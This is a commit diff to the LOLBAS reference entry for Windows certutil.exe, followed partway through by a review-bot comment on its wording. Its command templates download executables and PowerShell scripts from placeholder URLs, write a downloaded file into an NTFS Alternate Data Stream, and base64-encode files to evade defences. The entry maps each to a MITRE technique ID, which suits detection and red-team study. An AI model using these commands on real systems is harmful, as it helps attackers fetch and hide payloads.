Commit 90a991a

1 parent 5067f15 commit 90a991a

1 file changed, +20 -6 lines changed

_lolbas/Binaries/Certutil.md

Lines changed: 20 additions & 6 deletions
@@ -4,27 +4,36 @@ Description: Windows binary used for handling certificates
44
Author: Oddvar Moe
55
Created: 2018-05-25
66
Commands:
7-
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
8-
Description: Download and save executable to disk in the current folder.
7+
- Command: certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}
8+
Description: Download and save an executable to disk in the current folder.
99
Usecase: Download file from Internet
1010
Category: Download
1111
Privileges: User
1212
MitreID: T1105
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
14-
- Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
15-
Description: Download and save executable to disk in the current folder.
14+
- Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
15+
Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.
1616
Usecase: Download file from Internet
1717
Category: Download
1818
Privileges: User
1919
MitreID: T1105
2020
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
21-
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
22-
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
21+
- Command: certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
22+
Description: Download and save a .ps1 file to an Alternate Data Stream (ADS).
2323
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
2424
Category: ADS
2525
Privileges: User
2626
MitreID: T1564.004
2727
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
28+
- Command: certutil.exe -URL {REMOTEURL:.exe}
29+
Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].
30+
Usecase: Download file from Internet
31+
Category: Download
32+
Privileges: User
33+
MitreID: T1105
34+
OperatingSystem: Windows 10, Windows 11
35+
Tags:
36+
- Application: GUI
2837
- Command: certutil -encode {PATH} {PATH:.base64}
2938
Description: Command to encode a file using Base64
3039
Usecase: Encode files to evade defensive measures
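Review bot: The new Description on the -verifyctl entry documents two outcomes ("when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not"), but the Command template on that entry always passes {PATH:.exe}, so the cache-location case is never the command shown. Either trim the description to the path-specified case or give the no-path form its own entry, so each entry maps one command to one result. Two smaller points in the same hunk: the added -URL entry is tagged "Application: GUI" but its Description does not mention a GUI, and one clause there would tell readers what the tag means for this command; and "%LOCALAPPDATA%low" relies on appending "low" to the expanded variable, which reads like a typo unless the intended folder is spelled out once.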
@@ -65,6 +74,7 @@ Resources:
6574
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
6675
- Link: https://twitter.com/mattifestation/status/620107926288515072
6776
- Link: https://twitter.com/egre55/status/1087685529016193025
77+
- Link: https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/
6878
Acknowledgement:
6979
- Person: Matt Graeber
7080
Handle: '@mattifestation'
@@ -73,4 +83,8 @@ Acknowledgement:
7383
- Person: egre55
7484
Handle: '@egre55'
7585
- Person: Lior Adar
86+
- Person: Adam
87+
Handle: '@hexacorn'
88+
- Person: SomeTestLeper
89+
Handle: '@SomeTestLeper'
7690
---
